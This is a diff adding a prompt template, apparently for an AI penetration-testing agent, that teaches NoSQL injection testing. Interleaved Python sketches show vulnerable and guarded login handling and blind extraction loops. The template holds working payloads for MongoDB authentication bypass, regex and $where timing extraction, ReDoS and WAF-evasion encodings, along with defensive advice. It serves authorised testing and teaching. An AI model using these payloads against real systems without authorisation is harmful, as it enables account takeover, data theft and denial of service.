usestrix · timlzh · Dec 3, 2025
diff --git a/strix/prompts/vulnerabilities/nosql_injection.jinja b/strix/prompts/vulnerabilities/nosql_injection.jinja
@@ -0,0 +1,284 @@
+<nosql_injection_guide>
+<title>NoSQL INJECTION</title>
+
+<critical>NoSQL injection exploits vulnerabilities in non-relational databases (MongoDB, CouchDB, Redis, Cassandra, etc.) where user input manipulates query logic, operators, or JavaScript execution contexts. Unlike SQL injection, NoSQL attacks often target JSON/BSON structures, query operators, and server-side JavaScript evaluation. Treat every user-controlled input destined for NoSQL queries as untrusted.</critical>
+
+<scope>
+- Document stores: MongoDB, CouchDB, Couchbase, Amazon DocumentDB
+- Key-value stores: Redis, DynamoDB, Memcached
+- Wide-column stores: Cassandra, HBase, ScyllaDB
+- Graph databases: Neo4j, ArangoDB, Amazon Neptune
+- Integration paths: ODMs (Mongoose, Morphia), REST APIs, GraphQL resolvers, serverless functions
+</scope>
+
+<methodology>
+1. Identify NoSQL database type from error messages, response patterns, headers, or technology fingerprinting.
+2. Determine input format: JSON body, query string, URL path, headers; note how input is parsed and merged into queries.
+3. Test operator injection: inject MongoDB operators ($ne, $gt, $regex, $where) or database-specific syntax to alter query logic.
+4. Establish extraction channel: boolean-based response diffs, timing via $where/JavaScript, regex-based character extraction, or error messages.
+5. Pivot to authentication bypass, data exfiltration, or JavaScript execution depending on database capabilities.
+</methodology>
+
+<injection_surfaces>
+- JSON body parameters: direct object/operator injection via nested objects or arrays
+- Query string: array notation (?username[$ne]=) or JSON-encoded values
+- URL path segments: document IDs, collection names in RESTful APIs
+- Headers/cookies: session data parsed as JSON, JWT claims used in queries
+- GraphQL variables: unvalidated input passed directly to resolvers
+- Aggregation pipelines: $match, $lookup, $group stages with user-controlled fields
+</injection_surfaces>
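The query-string surface is easiest to see by parsing it. The sketch below uses a hypothetical helper, `parse_bracket_query`, that mimics what extended (qs-style) query-string parsers do with bracket notation. It is not the parser of any particular framework, and real parsers differ in edge cases.

```python
import re
from urllib.parse import parse_qsl


def parse_bracket_query(query: str) -> dict:
    """Parse qs-style bracket notation (a[b][c]=v) into nested dicts.

    Hypothetical helper for illustration only.
    """
    result: dict = {}
    for raw_key, value in parse_qsl(query, keep_blank_values=True):
        # "user[password][$gt]" -> ["user", "password", "$gt"]
        parts = [p for p in re.split(r"\[|\]", raw_key) if p]
        if not parts:
            continue
        node = result
        for part in parts[:-1]:
            node = node.setdefault(part, {})
        node[parts[-1]] = value
    return result


# A plain value stays a string; bracket notation becomes an operator object.
flat = parse_bracket_query("username=admin&password=secret")
injected = parse_bracket_query("username=admin&password[$ne]=wrongpass")
nested = parse_bracket_query("user[username]=admin&user[password][$gt]=")
```

If the application passes `injected` straight into a query filter, `password` is no longer a string to compare against but an operator document.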
+
+<detection_channels>
+<operator_based>
+- Inject query operators to modify predicate logic: {% raw %}{"username": {"$ne": null}}{% endraw %} matches every document whose username exists and is not null
+- Test comparison operators: $gt, $gte, $lt, $lte, $ne, $eq, $in, $nin
+- Logical operators: $or, $and, $nor to combine conditions
+</operator_based>
+
+<boolean_based>
+- Compare responses with true/false predicates; diff status codes, body length, specific content
+- Use $regex for character-by-character extraction: {% raw %}{"password": {"$regex": "^a"}}{% endraw %}
+- Binary search on character space using regex anchors
+</boolean_based>
+
+<timing_based>
+- MongoDB $where with sleep: {% raw %}{"$where": "sleep(5000)"}{% endraw %} or function-based delays
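+- Heavy regex operations causing ReDoS: {% raw %}{"field": {"$regex": "^(a+)+$"}}{% endraw %}; the regex runs against stored field values, so the delay only appears when a stored value is itself pathological (a long run of "a" followed by a non-matching character)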
+- Measure response time differences to infer query results
+</timing_based>
+
+<error_based>
+- Provoke type errors, invalid operator errors, or JavaScript runtime exceptions
+- Extract information from verbose error messages (stack traces, field names, versions)
+</error_based>
+</detection_channels>
+
+<dbms_primitives>
+<mongodb>
+- Operators for injection: $ne, $gt, $lt, $gte, $lte, $in, $nin, $or, $and, $regex, $where, $exists, $type
+- JavaScript execution: $where clause accepts JavaScript; $function in aggregations (MongoDB 4.4+)
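+- Version/info: db.version(), db.serverStatus(), db.hostInfo() (shell helpers; normally reachable only with shell or command-level access, not through operator injection alone)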
+- Authentication bypass: {% raw %}{"username": {"$ne": ""}, "password": {"$ne": ""}}{% endraw %}
+- Regex extraction: {% raw %}{"password": {"$regex": "^a.*"}}{% endraw %}; iterate over prefixes to extract the full value
+- $where JavaScript: {% raw %}{"$where": "this.username == 'admin' && this.password.match(/^a/)"}{% endraw %}
+- Aggregation injection: $lookup to access other collections, $out to write results
+</mongodb>
+
+<couchdb>
+- View injection via map/reduce functions (JavaScript execution)
+- Mango queries: operator injection similar to MongoDB ($eq, $ne, $gt, $regex, etc.)
+- _all_docs, _find endpoints with selector manipulation
+- Design document manipulation for persistent code execution
+</couchdb>
+
+<redis>
+- Command injection via protocol manipulation in poorly sanitized inputs
+- Lua script injection: EVAL command with user-controlled scripts
+- Key enumeration: KEYS *, SCAN with patterns
+- Data exfiltration: GET, HGETALL, LRANGE, SMEMBERS
+- Config manipulation: CONFIG SET to modify runtime behavior
+- File write via RDB: CONFIG SET dir/dbfilename + SAVE (requires privileges)
+</redis>
+
+<cassandra>
+- CQL injection: similar to SQL, string concatenation in WHERE clauses
+- ALLOW FILTERING abuse for unauthorized data access
+- UDFs (user-defined functions), if enabled: Java code execution (JavaScript UDFs exist only on older Cassandra releases)
+</cassandra>
+
+<neo4j>
+- Cypher injection: MATCH, WHERE, RETURN clause manipulation
+- APOC procedures: apoc.load.json, apoc.cypher.run for extended capabilities
+- Label/relationship injection to access unauthorized graph nodes
+</neo4j>
+</dbms_primitives>
+
+<authentication_bypass>
+<mongodb_operators>
+- Basic bypass: {% raw %}{"username": "admin", "password": {"$ne": ""}}{% endraw %}
+- Always true: {% raw %}{"username": {"$gt": ""}, "password": {"$gt": ""}}{% endraw %}
+- Regex wildcard: {% raw %}{"username": "admin", "password": {"$regex": ".*"}}{% endraw %}
+- $or injection: {% raw %}{"$or": [{"username": "admin"}, {"admin": true}], "password": {"$ne": ""}}{% endraw %}
+- Type match: {% raw %}{"username": "admin", "password": {"$type": 2}}{% endraw %} (BSON type 2 = string, so any string password matches)
+</mongodb_operators>
+
+<query_string_injection>
+- Array notation: ?username=admin&password[$ne]=wrongpass
+- Nested operators: ?user[username]=admin&user[password][$gt]=
+- URL-encoded JSON: ?filter=%7B%22username%22%3A%7B%22%24ne%22%3Anull%7D%7D
+</query_string_injection>
+</authentication_bypass>
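To make the bypass mechanics concrete, here is a minimal, self-contained sketch. It assumes an in-memory user list and a toy matcher (`match_value`, `find_one`) that imitates a small subset of MongoDB-style operators. Both login functions and all names are hypothetical and only approximate real driver behavior.

```python
import re

USERS = [{"username": "admin", "password": "s3cr3t!"}]  # stand-in for a collection


def match_value(stored, cond) -> bool:
    """Evaluate one field condition with simplified $ne/$gt/$regex semantics."""
    if not isinstance(cond, dict):
        return stored == cond
    for op, arg in cond.items():
        if op == "$ne":
            ok = stored != arg
        elif op == "$gt":
            ok = isinstance(stored, type(arg)) and stored > arg
        elif op == "$regex":
            ok = isinstance(stored, str) and re.search(arg, stored) is not None
        else:
            raise ValueError(f"unsupported operator: {op}")
        if not ok:
            return False
    return True


def find_one(query: dict):
    """Return the first user whose fields satisfy every condition in query."""
    for doc in USERS:
        if all(match_value(doc.get(field), cond) for field, cond in query.items()):
            return doc
    return None


def vulnerable_login(body: dict) -> bool:
    # Trusts the *structure* of the input: operator objects pass straight through.
    query = {"username": body.get("username"), "password": body.get("password")}
    return find_one(query) is not None


def guarded_login(body: dict) -> bool:
    # Rejects anything that is not a plain string before building the query.
    username, password = body.get("username"), body.get("password")
    if not isinstance(username, str) or not isinstance(password, str):
        return False
    return find_one({"username": username, "password": password}) is not None
```

With a wrong string password both functions refuse the login. With `{"$ne": ""}` in place of the password, only `vulnerable_login` accepts it.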
+
+<data_extraction>
+<regex_extraction>
+- Character-by-character: iterate {% raw %}{"field": {"$regex": "^<known>X"}}{% endraw %} for each position
+- Binary search: use character ranges [a-m] vs [n-z] to reduce requests
+- Case sensitivity: use $options: "i" for case-insensitive matching
+- Special chars: escape regex metacharacters (. * + ? ^ $ { } [ ] \ | ( ))
+</regex_extraction>
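The character-by-character loop and the escaping rule can be sketched as follows. The `oracle` function is a local stand-in for "send one request and observe whether the response indicates a match". `SECRET`, `extract_prefix`, and the alphabet are assumptions for illustration. Python's `re.escape` is used here; the escaping rules of the target's regex engine may differ slightly.

```python
import re
import string

SECRET = "p4ss.w0rd"  # stand-in for a stored value; the loop never reads it directly


def oracle(pattern: str) -> bool:
    """Stand-in for one request whose response differs on match vs. no match."""
    return re.search(pattern, SECRET) is not None


def extract_prefix(match_fn, alphabet: str, max_len: int = 64) -> str:
    """Recover a value one character at a time using anchored prefix patterns."""
    known = ""
    while len(known) < max_len:
        for ch in alphabet:
            # Escape the known prefix and the candidate so "." or "*" in the
            # data are matched literally instead of acting as metacharacters.
            if match_fn("^" + re.escape(known + ch)):
                known += ch
                break
        else:
            break  # no candidate extended the prefix: nothing more to recover
    return known


alphabet = string.ascii_letters + string.digits + string.punctuation
recovered = extract_prefix(oracle, alphabet)
```

Without the escaping step, an unescaped `.` candidate would match any character and the loop would record the wrong value at that position.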
+
+<boolean_extraction>
+- Use $regex or $where to create true/false conditions
+- Diff response length, status code, specific strings, or timing
+- Extract field names via $exists: {% raw %}{"unknownField": {"$exists": true}}{% endraw %}
+</boolean_extraction>
+
+<javascript_extraction>
+- $where with conditional: {% raw %}{"$where": "if(this.password[0]=='a'){sleep(5000)}"}{% endraw %}
+- Access Object.keys(): {% raw %}{"$where": "Object.keys(this)[0][0]=='u'"}{% endraw %} to enumerate fields
+- String operations: substring, charAt for positional extraction
+</javascript_extraction>
+
+<aggregation_based>
+- $lookup to join with other collections and leak data
+- $match with injected operators
+- $project to select fields, $group to aggregate sensitive data
+</aggregation_based>
+</data_extraction>
+
+<javascript_injection>
+<where_clause>
+- MongoDB $where executes JavaScript on the server
+- Basic: {% raw %}{"$where": "1==1"}{% endraw %} or {% raw %}{"$where": "true"}{% endraw %}
+- Sleep for timing: {% raw %}{"$where": "sleep(5000) || true"}{% endraw %}
+- Data access: {% raw %}{"$where": "this.password.length > 5"}{% endraw %}
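+- External calls (rarely possible): {% raw %}{"$where": "this.constructor.constructor('return fetch(...)')()"}{% endraw %}; MongoDB's server-side JavaScript engine normally exposes no network APIs such as fetch, so treat this as a probe rather than a reliable primitive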
+</where_clause>
+
+<function_operator>
+- MongoDB 4.4+ $function in aggregation: {% raw %}{"$function": {"body": "function(){...}", "args": [], "lang": "js"}}{% endraw %}
+- Server-side JavaScript must be enabled (not disabled via --noscripting)
+</function_operator>
+
+<mapreduce>
+- Inject into map/reduce functions if user input reaches these contexts
+- CouchDB views: JavaScript in map functions
+</mapreduce>
+</javascript_injection>
+
+<odm_and_framework_issues>
+<mongoose>
+- Dangerous patterns: find(req.body), findOne(req.query) without sanitization
+- $where passthrough: user input reaching $where conditions
+- Population/reference injection: manipulating $lookup-like operations
+- Schema bypass: __proto__, constructor pollution via JSON parsing
+</mongoose>
+
+<morphia_java>
+- String concatenation in filters instead of parameterized queries
+- Criteria API misuse with raw strings
+</morphia_java>
+
+<pymongo>
+- Database.eval() with user input (removed in PyMongo 4.0, and the server-side eval command was removed in MongoDB 4.2; still dangerous on legacy stacks)
+- find() with unsanitized dictionaries from JSON input
+- Codec manipulation affecting serialization
+</pymongo>
+</odm_and_framework_issues>
+
+<waf_and_filter_bypasses>
+<encoding_tricks>
+- URL encoding: %24ne instead of $ne
+- Double encoding: %2524ne
+- Unicode normalization: using different Unicode representations
+- JSON unicode escapes: \u0024ne for $ne
+</encoding_tricks>
+
+<operator_alternatives>
+- $not instead of $ne: {% raw %}{"field": {"$not": {"$eq": "value"}}}{% endraw %}
+- $nin instead of $ne: {% raw %}{"field": {"$nin": ["wrong"]}}{% endraw %}
+- $expr with $eq/$ne in aggregation context
+</operator_alternatives>
+
+<structure_manipulation>
+- Nested objects vs flat: {% raw %}{"a.b": "c"}{% endraw %} vs {% raw %}{"a": {"b": "c"}}{% endraw %}
+- Array injection: ["$or", ...] in systems parsing arrays as operators
+- Prototype pollution: __proto__, constructor.prototype in JSON
+</structure_manipulation>
+
+<comment_injection>
+- MongoDB shell: // or /* */ in JavaScript contexts
+- Newline injection in string concatenation scenarios
+</comment_injection>
+</waf_and_filter_bypasses>
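The encoding tricks work because a filter and the application may decode a different number of times. The short sketch below, using only the Python standard library, shows that each encoded form collapses to the same operator after the relevant decoding step. Variable names are illustrative.

```python
import json
from urllib.parse import unquote

# Single URL encoding: one decoding pass yields the operator.
single = unquote("%24ne")

# Double encoding: the first pass yields "%24ne", the second yields "$ne".
first_pass = unquote("%2524ne")
second_pass = unquote(first_pass)

# JSON unicode escape: the JSON parser itself turns \u0024 into "$".
escaped_key = next(iter(json.loads(r'{"\u0024ne": ""}')))

# URL-encoded JSON filter, as in the query-string examples earlier in the guide.
filter_doc = json.loads(unquote("%7B%22username%22%3A%7B%22%24ne%22%3Anull%7D%7D"))
```

A filter that inspects the raw bytes for `$ne` sees none of these, while the application, after decoding, receives the operator intact.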
+
+<blind_extraction>
+<binary_search>
+- Use $regex with character ranges: ^[a-m] vs ^[n-z]
+- Reduce character space: alphanumeric, then specific ranges
+- Position tracking: ^known_prefix[a-m] for next character
+</binary_search>
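A rough sketch of the range-halving idea, assuming a local `oracle` that stands in for a single request and a lowercase-alphanumeric alphabet. `SECRET`, `next_char`, and `extract` are hypothetical names, and the request counter exists only to show the saving over a linear scan.

```python
import re
import string

ALPHABET = sorted(string.ascii_lowercase + string.digits)
SECRET = "tok3n9"  # stand-in for a stored value
requests_made = 0


def oracle(pattern: str) -> bool:
    """Stand-in for one request; counts how many requests were needed."""
    global requests_made
    requests_made += 1
    return re.search(pattern, SECRET) is not None


def char_class(chars) -> str:
    """Build a regex character class such as [abc] from a list of characters."""
    return "[" + "".join(re.escape(c) for c in chars) + "]"


def next_char(match_fn, prefix: str):
    """Find the character after prefix by halving the candidate set each step."""
    base = "^" + re.escape(prefix)
    candidates = ALPHABET
    if not match_fn(base + char_class(candidates)):
        return None  # end of value, or next character is outside the alphabet
    while len(candidates) > 1:
        half = candidates[: len(candidates) // 2]
        candidates = half if match_fn(base + char_class(half)) else candidates[len(half):]
    return candidates[0]


def extract(match_fn, max_len: int = 32) -> str:
    known = ""
    while len(known) < max_len:
        ch = next_char(match_fn, known)
        if ch is None:
            break
        known += ch
    return known


recovered = extract(oracle)
```

Each position costs roughly log2 of the alphabet size plus one membership check, instead of up to one request per candidate character.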
+
+<timing_oracle>
+- $where with conditional sleep: {% raw %}if(condition){sleep(N)}{% endraw %}
+- ReDoS via pathological regex: ^(a+)+$ evaluated against long stored values
+- Heavy operations: sorting large datasets conditionally
+</timing_oracle>
+
+<response_differential>
+- Track: status codes (200/401/403/500), body length, specific strings, JSON structure
+- Normalize responses (hash/length) to reduce noise
+- Account for caching and rate limiting affecting responses
+</response_differential>
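One way to normalize responses before comparing them is sketched below. It assumes that the only per-request noise is ISO-style timestamps and long hex request IDs. Both patterns, the `Fingerprint` type, and the sample bodies are hypothetical and would need tuning for a real target.

```python
import hashlib
import re
from typing import NamedTuple


class Fingerprint(NamedTuple):
    status: int
    length: int
    digest: str


def fingerprint(status: int, body: str) -> Fingerprint:
    """Reduce a response to (status, normalized length, short hash)."""
    # Mask values that change on every request before hashing.
    normalized = re.sub(r"\d{4}-\d{2}-\d{2}T[\d:.]+Z?", "<ts>", body)
    normalized = re.sub(r"\b[0-9a-f]{16,}\b", "<id>", normalized)
    digest = hashlib.sha256(normalized.encode()).hexdigest()[:16]
    return Fingerprint(status, len(normalized), digest)


# Two "false" responses that differ only in noise, and one "true" response.
false_a = fingerprint(401, '{"ok":false,"ts":"2025-12-03T10:00:00Z","req":"9f86d081884c7d65"}')
false_b = fingerprint(401, '{"ok":false,"ts":"2025-12-03T10:00:05Z","req":"2a97516c354b6884"}')
true_c = fingerprint(200, '{"ok":true,"user":"admin","ts":"2025-12-03T10:00:09Z","req":"5e884898da280471"}')
```

Equal fingerprints for the two noisy "false" responses and a different one for the "true" response are what make the boolean oracle usable.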
+</blind_extraction>
+
+<server_side_injection>
+<ssjs_mongodb>
+- Server-Side JavaScript (SSJS) when $where, $function, mapReduce are exposed
+- Potential for: DoS (infinite loops), data access, limited RCE depending on config
+- Check: {% raw %}db.adminCommand({getParameter: 1, javascriptEnabled: 1}){% endraw %}
+</ssjs_mongodb>
+
+<dos_attacks>
+- ReDoS: {% raw %}{"field": {"$regex": "^(a+)+$"}}{% endraw %} against long strings
+- Resource exhaustion: large $in arrays, complex aggregations
+- Infinite loops in $where if SSJS is enabled without timeouts
+</dos_attacks>
+</server_side_injection>
+
+<graphql_nosql>
+- Variables passed directly to MongoDB queries: {% raw %}query { user(filter: $input) }{% endraw %}
+- Operator injection via GraphQL variables: {% raw %}{"filter": {"password": {"$ne": ""}}}{% endraw %}
+- Batching attacks: multiple queries to enumerate data
+- Introspection combined with injection for schema-aware attacks
+</graphql_nosql>
+
+<validation>
+1. Demonstrate that operator injection alters query behavior (auth bypass, extra data returned).
+2. Show that a boolean, timing, or error oracle confirms control over query predicates.
+3. Extract verifiable data: version info, field names, partial sensitive values.
+4. Provide minimal reproducible requests with clear injection points.
+5. Document database type and version; defenses vary significantly across NoSQL systems.
+</validation>
+
+<false_positives>
+- Strong typing/schema validation rejecting operator objects
+- ODM sanitization stripping $ prefixes from keys
+- Parameterized queries where operators cannot be injected
+- WAF blocking all $ operators (verify with encoding bypasses first)
+- Application logic unrelated to database predicates causing response variations
+</false_positives>
+
+<impact>
+- Authentication and authorization bypass via manipulated query predicates
+- Mass data exfiltration through regex extraction or aggregation manipulation
+- Server-side JavaScript execution leading to DoS or limited RCE
+- Privilege escalation by modifying user roles/permissions in database
+- Denial of service via ReDoS or resource-intensive queries
+</impact>
+
+<pro_tips>
+1. Start with the $ne and $gt operators; they are the most commonly injectable and the easiest to detect.
+2. Use boolean oracles first; timing channels are noisier and slower.
+3. For MongoDB, always test both JSON body and query string injection vectors.
+4. $regex is powerful for extraction but escape special characters properly.
+5. Check if SSJS is enabled before investing time in $where payloads.
+6. Aggregation pipelines often have weaker validation than simple find() queries.
+7. GraphQL + MongoDB is a common vulnerable combination; test variable injection.
+8. Monitor for ReDoS potential; it is useful both for detection and for assessing DoS impact responsibly.
+9. ODMs don't guarantee safety; audit raw query patterns and merge operations.
+10. Different NoSQL databases have vastly different capabilities; tailor payloads to the target.
+</pro_tips>
+
+<remember>NoSQL injection succeeds where applications trust user input structure, not just values. Validate that input types match expectations, strip or reject query operators from user data, and use ODM features that enforce schemas. The absence of SQL syntax does not mean the absence of injection risk.</remember>
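The "reject query operators from user data" advice could look roughly like the sketch below. `find_operator_keys` is a hypothetical helper, not a feature of any ODM. It only flags keys that start with `$`, and it assumes the input is already-parsed JSON (dicts, lists, scalars).

```python
def find_operator_keys(value, path: str = "") -> list:
    """Return the paths of all dict keys that start with '$', at any depth."""
    hits = []
    if isinstance(value, dict):
        for key, child in value.items():
            child_path = f"{path}.{key}" if path else str(key)
            if isinstance(key, str) and key.startswith("$"):
                hits.append(child_path)
            hits.extend(find_operator_keys(child, child_path))
    elif isinstance(value, list):
        for index, child in enumerate(value):
            hits.extend(find_operator_keys(child, f"{path}[{index}]"))
    return hits


safe_body = {"username": "admin", "password": "hunter2"}
bypass_body = {"username": "admin", "password": {"$ne": ""}}
nested_body = {"filter": [{"age": {"$gt": 18}}]}
```

A request handler would reject the body whenever the returned list is non-empty. Pairing this with explicit type checks (for example, requiring `password` to be a string) covers inputs that smuggle structure without a `$` key.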
+</nosql_injection_guide>